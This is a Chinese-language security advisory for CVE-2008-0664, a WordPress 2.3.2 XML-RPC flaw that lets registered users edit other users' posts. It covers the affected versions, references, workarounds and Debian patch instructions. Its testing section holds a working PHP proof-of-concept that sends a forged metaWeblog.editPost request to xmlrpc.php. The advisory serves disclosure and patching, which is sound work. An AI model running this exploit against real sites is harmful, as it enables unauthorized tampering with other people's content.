发布日期：2008-02-07
更新日期：2008-07-07

受影响系统：

WordPress WordPress 2.3.2

不受影响系统：

WordPress WordPress 2.3.3

描述：

---

BUGTRAQ  ID: 27669
CVE(CAN) ID: CVE-2008-0664

WordPress是一款免费的论坛Blog系统。

如果启用了注册的话，WordPress的XML-RPC实现（xmlrpc.php）就无法对页面所设置的post_type执行检查，这允许远程攻击者向论坛提交恶意请求更改编辑其他用户的张贴。

<*来源：Columcille
  
  链接：http://secunia.com/advisories/28823
        http://trac.wordpress.org/ticket/5313
        http://wordpress.org/development/2008/02/wordpress-233/
        https://bugzilla.redhat.com/long_list.cgi?buglist=431547
        http://www.village-idiot.org/archives/2008/02/02/wordpress-232-exploit-confirmed/
        http://www.debian.org/security/2008/dsa-1601
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?php
/**
* POC : XMLRPC Hack
*
*/
$host = ''; // blog url
$page = '/xmlrpc.php';
$data = '<?xml version="1.0" ?>
        <methodcall>
                <methodname>metaWeblog.editPost</methodname>
                <params>
                        <value>
                                <i4>post_ID</i4>
                        </value>
                        <value>
                                <string>username</string>
                        </value>
                        <value>
                                <string>password</string>
                        </value>
                        <struct>
                                <member>
                                        <name>post_type</name>
                                        <value>page</value>
                                </member>
                                <member>
                                        <name>title</name>
                                        <value>
                                                <string>Pwnd</string>
                                        </value>
                                </member>
                                <member>
                                        <name>description</name>
                                        <value>Whoo is ma biatch</value>
                                </member>
                        </struct>
                </params>
        </methodcall>';
  
$exploited = fsockopen($host, 80, $errorNumber, $errorString);
$requestHeader = " ".$page."  HTTP/1.1\r\n";
$requestHeader.= "Host: ".$host."\r\n";
$requestHeader.= "User-Agent:      Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0\r\n";
$requestHeader.= "Content-Type: application/x-www-form-urlencoded\r\n";
$requestHeader.= "Content-Length: ".strlen($data)."\r\n";
$requestHeader.= "Connection: close\r\n\r\n";
$requestHeader.= $data;
fwrite($exploited, $requestHeader );
  
echo 'done';
?>

建议：

---

临时解决方法：

* 禁止创建帐号，或临时删除xmlrpc.php文件。

厂商补丁：

Debian
------
Debian已经为此发布了一个安全公告（DSA-1601-1）以及相应补丁:
DSA-1601-1：New wordpress packages fix several vulnerabilities
链接：http://www.debian.org/security/2008/dsa-1601

补丁下载：

Source archives:

http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10.orig.tar.gz
Size/MD5 checksum:   520314 e9d5373b3c6413791f864d56b473dd54
http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10-1etch3.dsc
Size/MD5 checksum:      891 d925a63731976b72ad35e4c1805623bf
http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10-1etch3.diff.gz
Size/MD5 checksum:    46073 486916bd4fc6463181eaba84fdc2db31

Architecture independent packages:

http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10-1etch3_all.deb
Size/MD5 checksum:   527158 280ba949f5c38079d2209a468697fb00

补丁安装方法：

1. 手工安装补丁包：

  首先，使用下面的命令来下载补丁软件：
  # wget url  (url是补丁下载链接地址)

  然后，使用下面的命令来安装补丁：  
  # dpkg -i file.deb (file是相应的补丁名)

2. 使用apt-get自动安装补丁包：

   首先，使用下面的命令更新内部数据库：
   # apt-get update
  
   然后，使用下面的命令安装更新软件包：
   # apt-get upgrade

WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://wordpress.org/

浏览次数：2983
严重程度：0（网友投票）